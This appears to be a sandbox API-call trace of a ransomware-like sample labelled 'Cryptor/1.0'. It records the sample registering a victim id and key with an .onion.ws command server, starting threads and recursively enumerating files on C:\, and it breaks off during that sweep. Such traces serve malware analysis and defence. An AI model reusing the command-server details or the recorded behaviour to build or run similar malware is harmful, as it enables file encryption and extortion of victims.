[0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0087.199] WinHttpOpen (pszAgentW="Cryptor/1.0", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x9d3f90 [0087.297] WinHttpConnect (hSession=0x9d3f90, pswzServerName="e3kok4ekzalzapsf.onion.ws", nServerPort=0x1bb, dwReserved=0x0) returned 0x9e5dc8 [0087.475] WinHttpOpenRequest (hConnect=0x9e5dc8, pwszVerb="GET", pwszObjectName="/index.php?action=register&id=VNE3fKaJ&key=Zo65wrmfQPseXjTQDUqO86lzoZAe034GQm2a4ickvRzVFvtlQenIQyku1HzjP76a5rJTxtY9nLVG0H2vyNQAOKPPIy6DOjJPi8NcnmG9fM4mDJctl4385d5Cknm28Avu7xSE833bPlTWnkPxn2JUNlU1wTHnxZSFs1WefR6R2IYffaZWf8tkcWh2WhBnVjfR497eI62ryrYH2qdR2JweR9hajQYKoAf63Nx7NTlEliC4O64hoofQkNDKW6OzwTeZ", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x9e5eb0 [0087.475] WinHttpSendRequest (in: hRequest=0x9e5eb0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0 | out: lpOptional=0x0*) returned 1 [0119.480] WinHttpReceiveResponse (hRequest=0x9e5eb0, lpReserved=0x0) returned 1 [0119.488] WinHttpQueryDataAvailable (in: hRequest=0x9e5eb0, lpdwNumberOfBytesAvailable=0x5af378 | out: lpdwNumberOfBytesAvailable=0x5af378*=0x2) returned 1 [0119.489] WinHttpReadData (in: hRequest=0x9e5eb0, lpBuffer=0xaabdc0, dwNumberOfBytesToRead=0x2, lpdwNumberOfBytesRead=0x5af37c | out: lpBuffer=0xaabdc0*, lpdwNumberOfBytesRead=0x5af37c*=0x2) returned 1 [0119.489] RtlInitializeConditionVariable () returned 0x286e14c [0119.489] RtlInitializeConditionVariable () returned 0x281b148 [0119.489] GetCurrentThreadId () returned 0x968 [0119.489] GetCurrentThreadId () returned 0x968 [0119.489] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x284740, phModule=0x282733c | out: phModule=0x282733c*=0x280000) returned 1 [0119.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2afe5f, lpParameter=0x2827330, dwCreationFlags=0x0, lpThreadId=0x5af37c | out: lpThreadId=0x5af37c*=0x734) returned 0xf4 [0119.490] SleepConditionVariableSRW (in: ConditionVariable=0x286e14c, SRWLock=0x281b148, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x286e14c, SRWLock=0x281b148) returned 1 [0119.497] GetCurrentThreadId () returned 0x968 [0119.497] RtlInitializeConditionVariable () returned 0x286e14c [0119.497] RtlInitializeConditionVariable () returned 0x281b148 [0119.497] GetCurrentThreadId () returned 0x968 [0119.497] GetCurrentThreadId () returned 0x968 [0119.498] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x284740, phModule=0x28272fc | out: phModule=0x28272fc*=0x280000) returned 1 [0119.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2afe5f, lpParameter=0x28272f0, dwCreationFlags=0x0, lpThreadId=0x5af31c | out: lpThreadId=0x5af31c*=0x85c) returned 0x324 [0119.500] SleepConditionVariableSRW (in: ConditionVariable=0x286e14c, SRWLock=0x281b148, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x286e14c, SRWLock=0x281b148) returned 1 [0119.523] GetCurrentThreadId () returned 0x968 [0119.523] Sleep (dwMilliseconds=0x64) [0119.736] RtlInitializeConditionVariable () returned 0x286e14c [0119.736] RtlInitializeConditionVariable () returned 0x281b1b8 [0119.736] GetCurrentThreadId () returned 0x968 [0119.736] GetCurrentThreadId () returned 0x968 [0119.736] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x284740, phModule=0x282727c | out: phModule=0x282727c*=0x280000) returned 1 [0119.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2afe5f, lpParameter=0x2827270, dwCreationFlags=0x0, lpThreadId=0x5af31c | out: lpThreadId=0x5af31c*=0x83c) returned 0x36c [0119.737] SleepConditionVariableSRW (in: ConditionVariable=0x286e14c, SRWLock=0x281b1b8, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x286e14c, SRWLock=0x281b1b8) returned 1 [0119.780] GetCurrentThreadId () returned 0x968 [0119.780] GetCurrentThreadId () returned 0x968 [0119.780] WaitForSingleObjectEx (hHandle=0x36c, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 104 os_tid = 0xb58 Thread: id = 105 os_tid = 0xb60 Thread: id = 106 os_tid = 0xb64 Thread: id = 115 os_tid = 0xbb4 Thread: id = 119 os_tid = 0x80c Thread: id = 120 os_tid = 0x734 [0119.490] GetLastError () returned 0x54f [0119.491] SetLastError (dwErrCode=0x54f) [0119.491] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.491] GetLastError () returned 0x57 [0119.491] GetCurrentThreadId () returned 0x734 [0119.494] GetCurrentThreadId () returned 0x734 [0119.494] RtlWakeConditionVariable () returned 0x1 [0119.494] GetLogicalDrives () returned 0x4 [0119.494] RtlWakeAllConditionVariable () returned 0x0 [0119.495] RtlWakeAllConditionVariable () returned 0x0 [0119.495] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2daa58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0119.495] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2daa58, cbMultiByte=-1, lpWideCharStr=0x9c4f00, cchWideChar=1 | out: lpWideCharStr=":楮湯眮s敁㌰4ွ⃘") returned 0 [0119.495] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 0x284d468 [0119.495] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.495] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0x284d3a8 [0119.495] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.495] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.495] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.495] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.495] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.495] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.496] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 12 [0119.496] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.496] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0 [0119.496] FindClose (in: hFindFile=0x284d3a8 | out: hFindFile=0x284d3a8) returned 1 [0119.496] FindNextFileW (in: hFindFile=0x284d468, lpFindFileData=0x326ea18 | out: lpFindFileData=0x326ea18) returned 1 [0119.496] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 0x284d3a8 [0119.496] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.496] 